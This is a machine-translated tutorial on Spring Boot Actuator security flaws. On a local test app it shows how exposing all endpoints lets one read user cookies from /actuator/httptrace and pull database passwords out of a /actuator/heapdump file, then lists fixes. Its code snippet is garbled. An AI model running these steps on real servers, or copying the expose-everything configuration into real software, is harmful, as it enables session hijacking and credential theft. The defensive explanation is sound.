What The Springboot actuator can do is not described in detail here, but the security problems brought by the actuator are mainly discussed here.

1. Unauthorized use of HttpTrace

Httptrace is a record of each HTTP access to the application, including cookies, request parameters, and so on. Imagine having a cookie requested by a user and being able to log into that user’s account and do whatever you want. The first step is to create a Springboot project and introduce THE ACTUATOR with POM

<dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
Copy the code

Step 2: Add exposure to all endpoint configurations in application.properties, default exposure only (/health)

management.endpoints.web.exposure.include=*

Third, inject the HttpTraceRepository Bean, the repository of httpTrace

@Configuration
public class APPConfig {

    @Bean
    @ConditionalOnMissingBean(HttpTraceRepository.class)
    public HttpTraceRepository traceRepository(a){
        return newInMemoryHttpTraceRepository(); }}Copy the code

Look at the results, what are exposed endpoint, access (http://127.0.0.1:9999/actuator/)

http://127.0.0.1:9999/actuator/httptrace access httptrace see what information



If the cookie is a user login cookie, then you can simulate the user doing anything.

2. Run heapdump to obtain the database password

The first step, by visiting http://127.0.0.1:9999/actuator/env to check the application configuration information

Json format, search datasource, you can see database account, link string, password is hidden. All actuators associated with passwords are replaced with *** when they are exported.

If you can’t see the password in the configuration file, you can only find the password in the heap. Because all Java objects are stored in the heap, you can see the connection pool in the database.

throughhttp://127.0.0.1:9999/actuator/heapdumpDump is performed and downloaded, and we analyze the dump file through Jhat

accesshttp://127.0.0.1:7000/View heapdump analysis

The page control + f search datasource DataSourceInitializationMode

Click on it and go through two layers to find the heap database account and password and URLAt this point, we have successfully retrieved all the information from the linked database. Of course, the standard company for program link account password host is isolated, that is, even if you get the correct account and password, host is only accessible in the machine room, then you still can not link to the database. If you use a public network link then you have a serious security breach.

Data security is the foundation of the enterprise, security accidents often occur in these details, safety is no small matter, research and development needs to be careful.

There are several solutions to the above security problem: 1. By configuring the application itself, only basic endpoints are open, such as health checks, which the service center will use to detect heartbeats. 2. Access sensitive endpoint authorization by introducing Auth. 3, through the soft load limit, if there is a soft load such as nginx, then you can set the access rules in nginx, access sensitive endpoints, directly reject. 4. Account security control of the storage layer, for example, unified introduction of encryption mechanism.